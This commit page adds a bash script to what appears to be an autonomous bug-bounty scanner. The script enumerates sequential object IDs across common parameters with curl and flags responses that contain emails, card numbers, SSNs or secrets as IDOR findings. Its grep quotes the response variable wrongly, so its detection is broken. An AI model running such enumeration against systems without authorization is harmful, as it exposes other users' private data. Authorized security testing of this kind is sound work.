The Analyzer v1.0 — autonomous bug bounty engine with 20 attack vectors and Ollama brain
This commit is contained in:
46
vectors/10-idor.sh
Executable file
46
vectors/10-idor.sh
Executable file
@@ -0,0 +1,46 @@
|
||||
#!/usr/bin/env bash
|
||||
# Vector 10: Insecure Direct Object Reference
|
||||
# Desc: Access control bypass via object IDs
|
||||
# Detect: Numeric params, UUIDs, sequential IDs
|
||||
# Severity: HIGH
|
||||
# Tools: curl
|
||||
|
||||
vector_idor() {
|
||||
local target="$1"
|
||||
local report="$2"
|
||||
local findings=0
|
||||
|
||||
print_info "Testing IDOR vectors..."
|
||||
|
||||
local id_params=("id" "user_id" "uid" "account" "account_id" "profile" "order" "order_id" "invoice" "doc_id" "file_id" "pid" "cid" "sid" "token")
|
||||
|
||||
for param in "${id_params[@]}"; do
|
||||
# Try sequential IDs
|
||||
for id in 1 2 100 999 1000 1001; do
|
||||
local test_url=""
|
||||
if [[ "$target" == *\?* ]]; then
|
||||
test_url="${target}&${param}=${id}"
|
||||
else
|
||||
test_url="${target}?${param}=${id}"
|
||||
fi
|
||||
|
||||
local response=$(curl -s --connect-timeout 5 --max-time 10 \
|
||||
-H "User-Agent: Mozilla/5.0" \
|
||||
"$test_url" 2>/dev/null)
|
||||
|
||||
# Check for data leakage (JSON, names, emails, amounts)
|
||||
if echo "\$response" | grep -qiE '"email"|"credit_card"|"ssn"|"salary"|"balance"|"secret"|"private"|"admin"'; then
|
||||
print_find "Potential IDOR!" "Data accessible via $param=$id"
|
||||
echo "SEVERITY: HIGH
|
||||
VECTOR: Insecure Direct Object Reference (IDOR)
|
||||
DETAIL: Potential IDOR via parameter '$param' with value $id on $target
|
||||
EVIDENCE: Sensitive data in response: ${response:0:200}
|
||||
EXPLOIT: Enumerate IDs to access other users' data" > "$REPORTS_DIR/.finding_$(date +%s)_idor.txt"
|
||||
findings=$((findings + 1))
|
||||
break 2
|
||||
fi
|
||||
done
|
||||
done
|
||||
|
||||
return $findings
|
||||
}
|
||||
Reference in New Issue
Block a user